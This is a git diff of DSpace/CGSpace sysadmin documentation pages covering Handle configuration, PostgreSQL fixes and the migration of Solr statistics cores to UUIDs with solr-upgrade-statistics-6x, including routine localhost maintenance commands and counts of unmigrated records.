                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"backup_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                   )
                                                                                                                                                                                                                                                                                                                                                                                                                                   

I had regenerated the sitebndl.zip file on the CGIAR Library server and sent it to the Handle.net admins, but they said that there were mismatches between the public and private keys, which I suspect is due to make-handle-config not being very flexible. When I discussed our scenario with them, they said we actually don’t need to send an updated sitebndl.zip for this type of change, and the above config.dct edits are all that is required. I guess they just did something on their end by setting the authoritative IP address for the 10947 prefix to be the same as ours…

                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -250,17 +250,17 @@ $ sudo systemctl start nginx

                                                                                                                                                                                                                                                                                                                                                                                                                                  Troubleshooting

                                                                                                                                                                                                                                                                                                                                                                                                                                  Foreign Key Error in dspace cleanup

                                                                                                                                                                                                                                                                                                                                                                                                                                  The cleanup script is sometimes used during import processes to clean the database and assetstore after failed AIP imports. If you see the following error with dspace cleanup -v:

                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                  -  Detail: Key (bitstream_id)=(119841) is still referenced from table "bundle".
                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                  Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                  +  Detail: Key (bitstream_id)=(119841) is still referenced from table "bundle".
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  The solution is to set the primary_bitstream_id to NULL in PostgreSQL:

                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (119841);
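
When the error recurs with a different ID, it can help to extract the ID from the error text rather than retyping it. The following is only a minimal sketch: the variable names are illustrative assumptions, and it merely prints the statement for review instead of running it against the database.

```shell
# Error detail as printed by `dspace cleanup -v` (copied from the message above)
detail='Detail: Key (bitstream_id)=(119841) is still referenced from table "bundle".'

# Pull out the numeric bitstream ID between "=(" and ")"
bitstream_id=$(printf '%s\n' "$detail" | sed -n 's/.*Key (bitstream_id)=(\([0-9][0-9]*\)).*/\1/p')

# Build the UPDATE statement; review it before pasting it into psql
sql="UPDATE bundle SET primary_bitstream_id=NULL WHERE primary_bitstream_id IN (${bitstream_id});"
printf '%s\n' "$sql"
```

The printed statement has the same form as the manual fix shown above, so it can be pasted into a `psql` session once it has been checked.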
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  PSQLException During AIP Ingest

                                                                                                                                                                                                                                                                                                                                                                                                                                  After a few rounds of ingesting—possibly with failures—you might end up with inconsistent IDs in the database. In this case, during AIP ingest of a single collection in submit mode (-s):

                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                  org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                     Detail: Key (handle_id)=(86227) already exists.
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  The normal solution is to run the update-sequences.sql script (with Tomcat shut down) but it doesn’t seem to work in this case. Finding the maximum handle_id and manually updating the sequence seems to work:

                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
                                                                                                                                                                                                                                                                                                                                                                                                                                  -dspace=# select setval('handle_seq',86873);
                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# select setval('handle_seq',86873);
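
The two manual steps above (look up the maximum ID, then set the sequence) could probably be combined into one statement. This is a hedged sketch, assuming the sequence should simply be set to the current maximum `handle_id`; `build_setval_sql` is a hypothetical helper that only prints the SQL and does not touch the database.

```shell
# Hypothetical helper: print a statement that sets a sequence to the
# current maximum of a column. Arguments: sequence name, table, column.
build_setval_sql() {
  seq_name="$1"
  table_name="$2"
  column_name="$3"
  printf "SELECT setval('%s', (SELECT max(%s) FROM %s));\n" \
    "$seq_name" "$column_name" "$table_name"
}

# Print the statement for the handle table so it can be reviewed first
build_setval_sql handle_seq handle handle_id
```

After review, the output could be piped into `psql` (for example `build_setval_sql handle_seq handle handle_id | psql dspace`, where the database name `dspace` is taken from the prompt shown above).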
                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                  diff --git a/docs/cgspace-cgcorev2-migration/index.html b/docs/cgspace-cgcorev2-migration/index.html index d9a1b740a..855b493b3 100644 --- a/docs/cgspace-cgcorev2-migration/index.html +++ b/docs/cgspace-cgcorev2-migration/index.html @@ -18,7 +18,7 @@ - + @@ -445,7 +445,7 @@

                                                                                                                                                                                                                                                                                                                                                                                                                                ¹ Not committed yet because I don’t want to have to make minor adjustments in multiple commits. Re-apply the gauntlet of fixes with the sed script:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
                                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/cgspace-dspace6-upgrade/index.html b/docs/cgspace-dspace6-upgrade/index.html index fd22554fc..17459f7fd 100644 --- a/docs/cgspace-dspace6-upgrade/index.html +++ b/docs/cgspace-dspace6-upgrade/index.html @@ -18,7 +18,7 @@ - + @@ -129,283 +129,283 @@

                                                                                                                                                                                                                                                                                                                                                                                                                              Re-import OAI with clean index

                                                                                                                                                                                                                                                                                                                                                                                                                              After the upgrade is complete, re-index all items into OAI with a clean index:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                                                                                                                                                                                                                                                                                                                                                              -$ dspace oai -c import
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              The process ran out of memory several times so I had to keep trying again with more JVM heap memory.
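
The retry-with-more-heap routine described above could be scripted roughly as follows. This is only a sketch: the `run_with_growing_heap` helper, the 1024 MB step, and the 6144 MB ceiling in the usage comment are assumptions for illustration, not values from the original run. It also retries on any non-zero exit status, not only on out-of-memory errors.

```shell
#!/bin/sh
# Hypothetical helper (not part of DSpace): run a command and, if it fails,
# retry it with a larger JVM heap until it succeeds or a ceiling is reached.
# Usage: run_with_growing_heap START_MB MAX_MB COMMAND [ARGS...]
run_with_growing_heap() {
    heap_mb=$1
    max_mb=$2
    shift 2
    while [ "$heap_mb" -le "$max_mb" ]; do
        export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx${heap_mb}m"
        echo "Trying with -Xmx${heap_mb}m" >&2
        if "$@"; then
            return 0
        fi
        # Assumed step size; any failure is treated as a reason to retry.
        heap_mb=$((heap_mb + 1024))
    done
    return 1
}

# Example (commented out so the snippet has no side effects when sourced):
# run_with_growing_heap 2048 6144 dspace oai -c import
```

Capping the heap with a maximum keeps the loop from growing past what the host can actually provide.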


                                                                                                                                                                                                                                                                                                                                                                                                                              Processing Solr Statistics With solr-upgrade-statistics-6x

                                                                                                                                                                                                                                                                                                                                                                                                                              After the main upgrade process was finished and DSpace was running I started processing the Solr statistics with solr-upgrade-statistics-6x to migrate all IDs to UUIDs.

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics

                                                                                                                                                                                                                                                                                                                                                                                                                              First process the current year’s statistics core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                                                                                                              -$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           3,817,407    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,693,443    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             105,974    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              62,383    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             163,192    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             162,581    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             470,288    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           6,475,268    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -
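
The totals in the output above give a rough idea of why several rounds were needed. Assuming `-n` caps the number of records handled in one invocation (my reading of the option, worth checking against the DSpace documentation), the minimum number of runs is the total divided by the batch size, rounded up. The `rounds_needed` function is a hypothetical helper:

```shell
# Ceiling division: how many runs of size BATCH cover TOTAL records.
rounds_needed() {
    total=$1
    batch=$2
    echo $(( (total + batch - 1) / batch ))
}

# The per-type counts reported by the tool add up to the reported TOTAL.
echo $(( 3817407 + 1693443 + 105974 + 62383 + 163192 + 162581 + 470288 ))  # prints 6475268

rounds_needed 6475268 2500000  # prints 3
```

This is a lower bound only; runs that are interrupted or that hit the memory limit would add to it.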

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:


                                                                                                                                                                                                                                                                                                                                                                                                                              • 227,000: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 471,000: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 698,000: *:* NOT id:/.{36}/
• The majority are type: 5 (aka SITE, according to Constants.java), so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -
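
Counts like the ones listed above can be obtained by asking Solr for zero rows and reading `numFound` from the response, which is also a useful sanity check before running a delete. A minimal sketch, assuming the same Solr URL as in the delete command and JSON output; `solr_count` and `extract_num_found` are hypothetical helper names:

```shell
# Pull the numFound value out of a Solr JSON response read from stdin.
extract_num_found() {
    sed -n 's/.*"numFound": *\([0-9][0-9]*\).*/\1/p'
}

# Count documents in a core matching a query without fetching any of them.
# With --get, curl URL-encodes the query passed via --data-urlencode.
solr_count() {
    core=$1
    query=$2
    curl -s --get "http://localhost:8081/solr/${core}/select" \
        --data-urlencode "q=${query}" \
        --data "rows=0" \
        --data "wt=json" | extract_num_found
}

# Example (requires a running Solr, so left commented out):
# solr_count statistics 'id:/.+-unmigrated/'
```

The first two queries in the list are disjoint, so their counts should sum to the third: 227,000 + 471,000 = 698,000.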

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2019


                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2019 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           5,569,344    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           2,179,105    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             117,194    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             104,091    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             774,138    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             568,347    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,482,620    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -          10,794,839    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           5,569,344    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           2,179,105    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             117,194    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             104,091    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             774,138    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             568,347    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,482,620    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +          10,794,839    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 2,690,309: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1,494,587: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 4,184,896: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 4,172,929 are type: 5 (aka SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2019/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2018

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2019/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +
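The counts listed above can be cross-checked before purging. The following is a minimal Python sketch, not part of the original notes: it only redoes the arithmetic on the figures quoted above and rebuilds the delete-by-query body passed to `curl`. The names `delete_by_query_payload`, `NOT_UUID_NOT_UNMIGRATED`, `UNMIGRATED`, `NOT_UUID_TOTAL` and `SITE_TYPE` are hypothetical and introduced for illustration.

```python
from xml.sax.saxutils import escape

# Counts copied from the notes above (variable names are illustrative only).
NOT_UUID_NOT_UNMIGRATED = 2_690_309  # (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
UNMIGRATED = 1_494_587               # id:/.+-unmigrated/
NOT_UUID_TOTAL = 4_184_896           # *:* NOT id:/.{36}/
SITE_TYPE = 4_172_929                # documents reported as type: 5 (SITE)


def delete_by_query_payload(query: str) -> str:
    """Build the XML body for a Solr delete-by-query update request.

    The query is XML-escaped so characters such as & or < cannot break
    the document.
    """
    return f"<delete><query>{escape(query)}</query></delete>"


# The first two counts add up to the third, which is consistent with them
# splitting the non-UUID documents into two disjoint groups.
assert NOT_UUID_NOT_UNMIGRATED + UNMIGRATED == NOT_UUID_TOTAL

# Non-UUID documents that are not counted as type 5, going by the figures above.
non_site_remainder = NOT_UUID_TOTAL - SITE_TYPE  # 11,967

payload = delete_by_query_payload("*:* NOT id:/.{36}/")
print(payload)
print(f"non-UUID documents not of type 5: {non_site_remainder:,}")
```

Going by these figures, the delete query matches every non-UUID document, so it would also remove the 11,967 that are not counted as type 5.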

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2018

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2018 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           3,561,532    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,129,326    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              97,401    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              63,508    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             207,827    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -              43,752    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             457,820    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           5,561,166    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                                                                                                                                                                                                                                              -$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           3,561,532    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,129,326    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              97,401    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              63,508    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             207,827    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +              43,752    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             457,820    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +           5,561,166    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 365,473: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 546,955: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 923,158: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 823,293: are type: 5 so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +
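The purge above can be preceded by a count of what the query matches. The following is a minimal sketch, not the script used in these notes: the function names and the `SOLR_URL` variable are hypothetical, and it assumes the same local Solr endpoint as the `curl` command above. It relies only on Solr's standard `select` parameters (`q`, `rows`, `wt`) and the XML delete-by-query message already shown.

```shell
#!/usr/bin/env bash
# Hypothetical helpers: the names and SOLR_URL are assumptions for illustration.
SOLR_URL="${SOLR_URL:-http://localhost:8081/solr}"

# Build the XML body for a delete-by-query request.
# Note: no XML escaping is done, so the query must not contain & or <.
delete_by_query_xml() {
    printf '<delete><query>%s</query></delete>' "$1"
}

# Ask Solr how many documents match a query without returning any rows.
# The count is in response.numFound of the JSON reply.
count_matching() {
    local core="$1" query="$2"
    curl -s --get "$SOLR_URL/$core/select" \
        --data-urlencode "q=$query" \
        --data-urlencode "rows=0" \
        --data-urlencode "wt=json"
}

# Delete every document matching the query, then soft commit.
purge_matching() {
    local core="$1" query="$2"
    curl -s "$SOLR_URL/$core/update?softCommit=true" \
        -H "Content-Type: text/xml" \
        --data-binary "$(delete_by_query_xml "$query")"
}
```

For example, `count_matching statistics-2018 '*:* NOT id:/.{36}/'` would report the number of documents that `purge_matching statistics-2018 '*:* NOT id:/.{36}/'` is about to remove.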

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2017

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2017 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2017
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           2,529,208    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,618,717    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             144,945    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              74,249    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             479,647    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             114,658    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             852,215    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           5,813,639    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2017
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           2,529,208    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,618,717    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             144,945    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              74,249    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             479,647    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             114,658    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             852,215    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +           5,813,639    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 808,309: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 893,868: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1,702,177: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1,660,524 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2016

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2016

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2016 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2016
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,765,924    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,151,575    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             187,110    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              51,204    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             347,382    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -              66,605    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             620,298    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           4,190,098    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
